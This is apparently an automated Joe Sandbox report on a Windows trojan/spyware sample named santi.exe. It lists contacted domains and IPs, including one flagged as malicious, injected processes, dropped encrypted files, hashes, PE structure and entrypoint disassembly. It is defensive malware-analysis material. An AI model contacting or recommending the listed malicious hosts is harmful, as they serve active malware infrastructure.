                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://duckduckgo.com/chrome_newtabmsdt.exe, 0000000B.00000002.3135470132.000000000771C000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://duckduckgo.com/ac/?q=msdt.exe, 0000000B.00000002.3135470132.000000000771C000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icomsdt.exe, 0000000B.00000002.3135470132.000000000771C000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.ecosia.org/search?q=msdt.exe, 0000000B.00000002.3135470132.000000000771C000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.losmason.shop/uktz/?jp30l4Dh=jNuUE2eCtmsdt.exe, 0000000B.00000002.3133665309.00000000052B6000.00000004.10000000.00040000.00000000.sdmp, lavilIyGJqg.exe, 0000000C.00000002.3133057463.0000000003746000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.espiritismo.infolavilIyGJqg.exe, 0000000C.00000002.3132349262.0000000002D75000.00000040.80000000.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=msdt.exe, 0000000B.00000002.3135470132.000000000771C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=msdt.exe, 0000000B.00000002.3135470132.000000000771C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://www.ecosia.org/newtab/msdt.exe, 0000000B.00000002.3135470132.000000000771C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://ac.ecosia.org/autocomplete?q=msdt.exe, 0000000B.00000002.3135470132.000000000771C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://cdn.ecosia.org/msdt.exe, 0000000B.00000002.3135470132.000000000771C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchmsdt.exe, 0000000B.00000002.3135470132.000000000771C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://t.me/NVissionfirefox.exe, 00000010.00000002.2038827866.000000000A714000.00000004.80000000.00040000.00000000.sdmpfalse
                                                            		high
                                                            http://www.gmx.net/produkte/homepage-mail/homepage-parken/msdt.exe, 0000000B.00000002.3133665309.000000000576C000.00000004.10000000.00040000.00000000.sdmp, lavilIyGJqg.exe, 0000000C.00000002.3133057463.0000000003BFC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              		high

                                                              World Map of Contacted IPs

                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs

                                                              Public IPs

                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              104.18.73.116
                                                              		www.losmason.shopUnited States
                                                              		13335CLOUDFLARENETUStrue
                                                              90.156.201.74
                                                              		www.n-vis.groupRussian Federation
                                                              		25532MASTERHOST-ASMoscowRussiaRUfalse
                                                              13.248.169.48
                                                              		www.lirio.shopUnited States
                                                              		16509AMAZON-02USfalse
                                                              207.148.38.19
                                                              		5w23j7d4.n.fly8899.comHong Kong
                                                              		59371DNC-ASDimensionNetworkCommunicationLimitedHKfalse
                                                              104.21.88.139
                                                              		www.incgruporxat.clickUnited States
                                                              		13335CLOUDFLARENETUSfalse
                                                              62.116.130.8
                                                              		www.gkfundeis.netGermany
                                                              		15456INTERNETX-ASDEfalse
                                                              185.106.208.3
                                                              		holytur.netTurkey
                                                              		42846GUZELHOSTINGGNETINTERNETTELEKOMUNIKASYONASTRfalse
                                                              3.33.130.190
                                                              		espiritismo.infoUnited States
                                                              		8987AMAZONEXPANSIONGBfalse
                                                              66.29.148.78
                                                              		dialagiaja18.buzzUnited States
                                                              		19538ADVANTAGECOMUSfalse

                                                              General Information

                                                              Joe Sandbox version:41.0.0 Charoite
                                                              Analysis ID:1561742
                                                              Start date and time:2024-11-24 08:32:50 +01:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 9m 42s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                              Run name:Run with higher sleep bypass
                                                              Number of analysed new started processes analysed:17
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:2
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample name:santi.exe
                                                              Detection:MAL
                                                              Classification:mal100.troj.spyw.evad.winEXE@7/3@10/9
                                                              EGA Information:
                                                              • Successful, ratio: 75%
                                                              HCA Information:
                                                              • Successful, ratio: 96%
                                                              • Number of executed functions: 46
                                                              • Number of non-executed functions: 304
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .exe
                                                              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                              • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                              Warnings

                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                              • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                              • Execution Graph export aborted for target lavilIyGJqg.exe, PID 1292 because it is empty
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                              Simulations

                                                              Behavior and APIs

                                                              No simulations

                                                              Joe Sandbox View / Context

                                                              IPs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              104.18.73.116http://www.toolfriendonline.comGet hashmaliciousUnknownBrowse
                                                              • www.toolfriendonline.com/
                                                              http://nigoovip.comGet hashmaliciousUnknownBrowse
                                                              • nigoovip.com/
                                                              13.248.169.48PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                              • www.optimismbank.xyz/98j3/
                                                              CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                              • www.tals.xyz/cpgr/
                                                              VSP469620.exeGet hashmaliciousFormBookBrowse
                                                              • www.heliopsis.xyz/cclj/?9HaD=8+p9jI+W8p4gGfkrJ06IbG7GVrDrFE39Gbevi7MMoG/mxV0OJ3bBQ6ZfzHGiIebJDzxdJU835govK3Wq3/2OXcUb6pzjLf8wiqFw/QHcYMK4syzjiA==&wdv4=1RD4
                                                              CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                              • www.tals.xyz/cpgr/
                                                              Mandatory Notice for all December Leave and Vacation application.exeGet hashmaliciousFormBookBrowse
                                                              • www.tals.xyz/stx5/
                                                              Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeGet hashmaliciousFormBookBrowse
                                                              • www.tals.xyz/k1td/
                                                              DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                              • www.aiactor.xyz/x4ne/?KV=IjUvc9W1zDiNc9PqfXKx1TS0r6LahxQTMxD+2/9txvMkLHbQHvhCPVSp7yYBhZqVsANcjuLc38irD20I6v8c1v1ytT+DEei/9odakMDFYuDWzKGl/p+Lmpo=&Wno=a0qDq
                                                              CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                              • www.remedies.pro/hrap/
                                                              SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                              • www.optimismbank.xyz/lnyv/
                                                              New Order - RCII900718_Contract Drafting.exeGet hashmaliciousFormBookBrowse
                                                              • www.avalanchefi.xyz/ctta/

                                                              Domains

                                                              No context

                                                              ASNs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              CLOUDFLARENETUSZjH6H6xqo7.exeGet hashmaliciousLummaCBrowse
                                                              • 104.21.47.136
                                                              PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                              • 104.21.40.167
                                                              file.exeGet hashmaliciousFormBookBrowse
                                                              • 172.67.186.192
                                                              CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                              • 172.67.168.228
                                                              CargoInvoice_Outstanding_56789_2024-11-21.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                              • 172.67.191.199
                                                              ZEcVl5jzXD.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 104.21.67.152
                                                              VSP469620.exeGet hashmaliciousFormBookBrowse
                                                              • 104.21.44.16
                                                              purchase Order.exeGet hashmaliciousFormBookBrowse
                                                              • 172.67.145.234
                                                              CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                              • 172.67.168.228
                                                              Papyment_Advice.exeGet hashmaliciousMassLogger RATBrowse
                                                              • 104.21.67.152
                                                              MASTERHOST-ASMoscowRussiaRUarm.nn-20241122-0008.elfGet hashmaliciousMirai, OkiruBrowse
                                                              • 217.16.29.179
                                                              arm4.elfGet hashmaliciousMiraiBrowse
                                                              • 84.252.144.212
                                                              U9jAFGWgPG.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                              • 90.156.163.55
                                                              sora.ppc.elfGet hashmaliciousMiraiBrowse
                                                              • 90.156.146.158
                                                              ukOlLduCBM.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                              • 90.156.163.10
                                                              T52Z708x2p.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                              • 90.156.162.79
                                                              lJ4EzPSKMj.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                              • 90.156.160.86
                                                              Us051y7j25.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                              • 90.156.160.66
                                                              la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                              • 90.156.164.196
                                                              arm7.elfGet hashmaliciousUnknownBrowse
                                                              • 84.252.144.208
                                                              AMAZON-02USPAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                              • 13.248.169.48
                                                              CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                              • 13.248.221.243
                                                              VSP469620.exeGet hashmaliciousFormBookBrowse
                                                              • 13.248.169.48
                                                              CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                              • 76.223.74.74
                                                              arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                              • 3.122.148.244
                                                              arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                              • 13.223.155.145
                                                              sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                              • 18.243.54.8
                                                              arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                              • 15.206.178.249
                                                              x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                              • 3.99.230.17
                                                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                              • 3.167.69.129
                                                              DNC-ASDimensionNetworkCommunicationLimitedHKFzmC0FwV6y.exeGet hashmaliciousFormBookBrowse
                                                              • 46.149.198.158
                                                              wODub61gZe.exeGet hashmaliciousFormBookBrowse
                                                              • 147.92.40.175
                                                              ffsBbRe8UN.exeGet hashmaliciousFormBookBrowse
                                                              • 147.92.40.174
                                                              la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                              • 66.233.187.82
                                                              T9W7MCS2HI.exeGet hashmaliciousFormBookBrowse
                                                              • 147.92.40.174
                                                              970Qh1XiFt.elfGet hashmaliciousMirai, OkiruBrowse
                                                              • 66.233.31.204
                                                              http://wap.smarthomehungary.com/Get hashmaliciousUnknownBrowse
                                                              • 67.211.66.98
                                                              UPDATED Q-LOT24038.exeGet hashmaliciousFormBookBrowse
                                                              • 147.92.40.174
                                                              hH4dbIGfGT.exeGet hashmaliciousFormBookBrowse
                                                              • 147.92.40.175
                                                              Fvqw64NU4k.exeGet hashmaliciousFormBookBrowse
                                                              • 103.248.137.209

                                                              JA3 Fingerprints

                                                              No context

                                                              Dropped Files

                                                              No context

                                                              Created / dropped Files

                                                              C:\Users\user\AppData\Local\Temp\73272964

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\msdt.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                              Category:modified
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.1215420383712111
                                                              Encrypted:false
                                                              SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                              MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                              SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                              SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                              SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                              Malicious:false
                                                              Reputation:moderate, very likely benign file
                                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Local\Temp\aut9282.tmp

                                                              Download File
                                                              Process:C:\Users\user\Desktop\santi.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):288256
                                                              Entropy (8bit):7.993998697501262
                                                              Encrypted:true
                                                              SSDEEP:6144:Dgsgoqv6Ac6PSIgc28laeDsXOxk6dh2rOAVM71a5FuCUZx/VznAStHXO:DgFVSIPRY8YevxkQ2rOaMZqNUZx/uS3O
                                                              MD5:F5D487101F22D75949BB2D06D8F2661F
                                                              SHA1:A4DD881DE5FF121373E8130D21DC55FC4B24C66E
                                                              SHA-256:9C2571E6ACAAD3D8FEF4A4CC0B94553CCE3E87E9DC9CC317057992A96C46EFB8
                                                              SHA-512:1EFA099F54589C135D3219659D817A6691EC2E835B333ACC3C0DF5617090B1643FF521CE19E6EE976B0FC4041D6DD393140FD20BC91F464D883FD044673819A3
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:...CRJX6UCW3..6M.PZTWBBC.JX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZT.BBC_U.8Q.^.k.7..q.<>1b3#%?D0.wP+_X"Cp81w07-q#6.....'^R(.]W^sBBCQJX6(B^.wQQ..0=.j"%.K...k#0.P....0=.M..m*?..*4[wQQ.7PZTWBBC..X6.BV3|x..7PZTWBBC.JZ7ZB\3Je2M7PZTWBBC._X6QSW3JA2M7P.TWRBCQHX6WCW3J16M1PZTWBBCQ:\6QAW3J16M5P..WBRCQZX6QCG3J!6M7PZTGBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3dES5CPZTS.FCQZX6Q.S3J!6M7PZTWBBCQJX6qCWSJ16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZT

                                                              C:\Users\user\AppData\Local\Temp\bothsidedness

                                                              Download File
                                                              Process:C:\Users\user\Desktop\santi.exe
                                                              File Type:data
                                                              Category:modified
                                                              Size (bytes):288256
                                                              Entropy (8bit):7.993998697501262
                                                              Encrypted:true
                                                              SSDEEP:6144:Dgsgoqv6Ac6PSIgc28laeDsXOxk6dh2rOAVM71a5FuCUZx/VznAStHXO:DgFVSIPRY8YevxkQ2rOaMZqNUZx/uS3O
                                                              MD5:F5D487101F22D75949BB2D06D8F2661F
                                                              SHA1:A4DD881DE5FF121373E8130D21DC55FC4B24C66E
                                                              SHA-256:9C2571E6ACAAD3D8FEF4A4CC0B94553CCE3E87E9DC9CC317057992A96C46EFB8
                                                              SHA-512:1EFA099F54589C135D3219659D817A6691EC2E835B333ACC3C0DF5617090B1643FF521CE19E6EE976B0FC4041D6DD393140FD20BC91F464D883FD044673819A3
                                                              Malicious:false
                                                              Preview:...CRJX6UCW3..6M.PZTWBBC.JX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZT.BBC_U.8Q.^.k.7..q.<>1b3#%?D0.wP+_X"Cp81w07-q#6.....'^R(.]W^sBBCQJX6(B^.wQQ..0=.j"%.K...k#0.P....0=.M..m*?..*4[wQQ.7PZTWBBC..X6.BV3|x..7PZTWBBC.JZ7ZB\3Je2M7PZTWBBC._X6QSW3JA2M7P.TWRBCQHX6WCW3J16M1PZTWBBCQ:\6QAW3J16M5P..WBRCQZX6QCG3J!6M7PZTGBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3dES5CPZTS.FCQZX6Q.S3J!6M7PZTWBBCQJX6qCWSJ16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZTWBBCQJX6QCW3J16M7PZT

                                                              Static File Info

                                                              General

                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Entropy (8bit):7.149862359107822
                                                              TrID:
                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                              • DOS Executable Generic (2002/1) 0.02%
                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                              File name:santi.exe
                                                              File size:1'214'464 bytes
                                                              MD5:c086de804062f1c6ebf2e42057187b24
                                                              SHA1:8f57ba2121877ecae5a800b28f2fc89421485d1f
                                                              SHA256:a538495e66f9396821392539284e4752ef3569f1d1f7b592cb438908b6c93efa
                                                              SHA512:fbbde874435c11e8b46dd8ef2b5609226480894e129a40bd185b23504391aec7cfb90aef1d8dbd9d7cb13b7c47a5d484ffba9ab88df84c2778aa880c874b00ec
                                                              SSDEEP:24576:Xtb20pkaCqT5TBWgNQ7aK3rWXK/5QI8qD8nBSh6A:UVg5tQ7aK3rSv44ns5
                                                              TLSH:D045D01273DD8361C3B25273BA26B711BE7B782506B5F46B2FD8093DF920162521EA73
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

                                                              File Icon

                                                              Icon Hash:aaf3e3e3938382a0

                                                              Static PE Info

                                                              General

                                                              Entrypoint:0x425f74
                                                              Entrypoint Section:.text
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                              Time Stamp:0x674068DC [Fri Nov 22 11:19:56 2024 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:5
                                                              OS Version Minor:1
                                                              File Version Major:5
                                                              File Version Minor:1
                                                              Subsystem Version Major:5
                                                              Subsystem Version Minor:1
                                                              Import Hash:3d95adbf13bbe79dc24dccb401c12091

                                                              Entrypoint Preview

                                                              Instruction
                                                              call 00007F7FCD15027Fh
                                                              jmp 00007F7FCD143294h
                                                              int3
                                                              int3
                                                              push edi
                                                              push esi
                                                              mov esi, dword ptr [esp+10h]
                                                              mov ecx, dword ptr [esp+14h]
                                                              mov edi, dword ptr [esp+0Ch]
                                                              mov eax, ecx
                                                              mov edx, ecx
                                                              add eax, esi
                                                              cmp edi, esi
                                                              jbe 00007F7FCD14341Ah
                                                              cmp edi, eax
                                                              jc 00007F7FCD14377Eh
                                                              bt dword ptr [004C0158h], 01h
                                                              jnc 00007F7FCD143419h
                                                              rep movsb
                                                              jmp 00007F7FCD14372Ch
                                                              cmp ecx, 00000080h
                                                              jc 00007F7FCD1435E4h
                                                              mov eax, edi
                                                              xor eax, esi
                                                              test eax, 0000000Fh
                                                              jne 00007F7FCD143420h
                                                              bt dword ptr [004BA370h], 01h
                                                              jc 00007F7FCD1438F0h
                                                              bt dword ptr [004C0158h], 00000000h
                                                              jnc 00007F7FCD1435BDh
                                                              test edi, 00000003h
                                                              jne 00007F7FCD1435CEh
                                                              test esi, 00000003h
                                                              jne 00007F7FCD1435ADh
                                                              bt edi, 02h
                                                              jnc 00007F7FCD14341Fh
                                                              mov eax, dword ptr [esi]
                                                              sub ecx, 04h
                                                              lea esi, dword ptr [esi+04h]
                                                              mov dword ptr [edi], eax
                                                              lea edi, dword ptr [edi+04h]
                                                              bt edi, 03h
                                                              jnc 00007F7FCD143423h
                                                              movq xmm1, qword ptr [esi]
                                                              sub ecx, 08h
                                                              lea esi, dword ptr [esi+08h]
                                                              movq qword ptr [edi], xmm1
                                                              lea edi, dword ptr [edi+08h]
                                                              test esi, 00000007h
                                                              je 00007F7FCD143475h
                                                              bt esi, 03h
                                                              jnc 00007F7FCD1434C8h
                                                              movdqa xmm1, dqword ptr [esi+00h]

                                                              Rich Headers

                                                              Programming Language:
                                                              • [ C ] VS2008 SP1 build 30729
                                                              • [IMP] VS2008 SP1 build 30729
                                                              • [ASM] VS2012 UPD4 build 61030
                                                              • [RES] VS2012 UPD4 build 61030
                                                              • [LNK] VS2012 UPD4 build 61030

                                                              Data Directories

                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xb70040x17c.rdata
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x5f7a0.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x1240000x6c4c.reloc
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x8d8d00x1c.rdata
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb27300x40.rdata
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT0x8d0000x860.rdata
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                              Sections

                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              .text0x10000x8b54f0x8b600f437a6545e938612764dbb0a314376fcFalse0.5699499019058296data6.680413749210956IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                              .rdata0x8d0000x2cc420x2ce00827ffd24759e8e420890ecf164be989eFalse0.330464397632312data5.770192333189168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .data0xba0000x9d540x6200e0a519f8e3a35fae0d9c2cfd5a4bacfcFalse0.16402264030612246data2.002691099965349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              .rsrc0xc40000x5f7a00x5f800702b1c16d5f920c505ae406c06ebddb1False0.9333560004908377data7.906166415871796IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .reloc0x1240000xa4740xa6000bc98f8631ef0bde830a7f83bb06ff08False0.5017884036144579data5.245426654116355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                              Resources

                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                              RT_ICON0xc44a00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                              RT_ICON0xc45c80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                              RT_ICON0xc48b00x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                              RT_ICON0xc49d80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                              RT_ICON0xc58800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                              RT_ICON0xc61280x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                              RT_ICON0xc66900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                              RT_ICON0xc8c380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                              RT_ICON0xc9ce00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                              RT_STRING0xca1480x594dataEnglishGreat Britain0.3333333333333333
                                                              RT_STRING0xca6dc0x68adataEnglishGreat Britain0.2747909199522103
                                                              RT_STRING0xcad680x490dataEnglishGreat Britain0.3715753424657534
                                                              RT_STRING0xcb1f80x5fcdataEnglishGreat Britain0.3087467362924282
                                                              RT_STRING0xcb7f40x65cdataEnglishGreat Britain0.34336609336609336
                                                              RT_STRING0xcbe500x466dataEnglishGreat Britain0.3605683836589698
                                                              RT_STRING0xcc2b80x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                              RT_RCDATA0xcc4100x56e77data1.000325880227779
                                                              RT_GROUP_ICON0x1232880x76dataEnglishGreat Britain0.6610169491525424
                                                              RT_GROUP_ICON0x1233000x14dataEnglishGreat Britain1.15
                                                              RT_VERSION0x1233140xdcdataEnglishGreat Britain0.6181818181818182
                                                              RT_MANIFEST0x1233f00x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814

                                                              Imports

                                                              DLLImport
                                                              WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                                                              VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                              WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                              COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                                                              MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
